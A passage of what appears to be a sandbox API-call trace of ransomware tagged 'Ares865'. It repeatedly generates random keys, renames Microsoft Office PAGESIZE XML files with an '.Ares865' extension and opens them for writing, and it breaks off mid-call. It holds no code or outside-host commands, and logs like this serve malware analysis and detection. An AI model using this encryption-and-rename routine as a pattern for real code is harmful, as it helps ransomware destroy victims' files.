[0069.045] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.045] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.048] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.048] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.048] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.049] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML.Ares865") returned 72 [0069.049] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl089.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl089.xml.ares865"), dwFlags=0x1) returned 1 [0069.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL089.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl089.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.051] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=46386) returned 1 [0069.051] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.052] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.052] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.056] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.056] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.056] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.057] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML.Ares865") returned 72 [0069.057] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl090.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl090.xml.ares865"), dwFlags=0x1) returned 1 [0069.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL090.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl090.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.058] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=74930) returned 1 [0069.058] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.059] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.059] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.064] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.065] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.065] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.066] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML.Ares865") returned 72 [0069.066] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl092.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl092.xml.ares865"), dwFlags=0x1) returned 1 [0069.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL092.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl092.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.067] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=104994) returned 1 [0069.067] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.068] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.068] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.074] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.075] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.075] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.077] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML.Ares865") returned 72 [0069.077] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl093.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl093.xml.ares865"), dwFlags=0x1) returned 1 [0069.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL093.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl093.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.078] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=46042) returned 1 [0069.078] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.079] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.079] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.085] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.086] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.086] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.087] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML.Ares865") returned 72 [0069.087] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl095.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl095.xml.ares865"), dwFlags=0x1) returned 1 [0069.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL095.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl095.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.088] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=106984) returned 1 [0069.088] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.089] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.089] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.095] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.095] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.095] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.097] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML.Ares865") returned 72 [0069.097] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl096.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl096.xml.ares865"), dwFlags=0x1) returned 1 [0069.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL096.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl096.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.098] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=106206) returned 1 [0069.098] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.099] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.099] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.106] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.106] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.106] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.108] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML.Ares865") returned 72 [0069.108] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl097.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl097.xml.ares865"), dwFlags=0x1) returned 1 [0069.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL097.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl097.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.109] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=32954) returned 1 [0069.109] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.110] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.110] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.114] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.115] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.115] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.116] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML.Ares865") returned 72 [0069.116] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl102.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl102.xml.ares865"), dwFlags=0x1) returned 1 [0069.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL102.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl102.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.117] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=59184) returned 1 [0069.117] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.118] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.118] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.122] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.123] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.123] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.124] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML.Ares865") returned 72 [0069.124] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl103.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl103.xml.ares865"), dwFlags=0x1) returned 1 [0069.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL103.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl103.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.125] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=162542) returned 1 [0069.125] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.126] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.126] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.135] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.135] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.135] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.138] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML.Ares865") returned 72 [0069.138] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl104.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl104.xml.ares865"), dwFlags=0x1) returned 1 [0069.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL104.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl104.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.139] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=130290) returned 1 [0069.139] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.140] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.140] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.146] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.147] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.147] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.150] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML.Ares865") returned 72 [0069.150] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl105.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl105.xml.ares865"), dwFlags=0x1) returned 1 [0069.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL105.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl105.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.151] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=86160) returned 1 [0069.151] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.152] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.152] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.158] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.158] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.158] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.160] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML.Ares865") returned 72 [0069.160] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl106.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl106.xml.ares865"), dwFlags=0x1) returned 1 [0069.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL106.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl106.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.161] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=39652) returned 1 [0069.162] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.162] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.162] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.166] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.167] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.167] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.168] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML.Ares865") returned 72 [0069.168] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl107.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl107.xml.ares865"), dwFlags=0x1) returned 1 [0069.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL107.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl107.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.169] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=120262) returned 1 [0069.169] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.170] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.170] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.176] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.177] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.177] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.179] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML.Ares865") returned 72 [0069.179] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl108.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl108.xml.ares865"), dwFlags=0x1) returned 1 [0069.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL108.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl108.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.180] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=187372) returned 1 [0069.180] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.181] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.181] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.190] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.191] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, 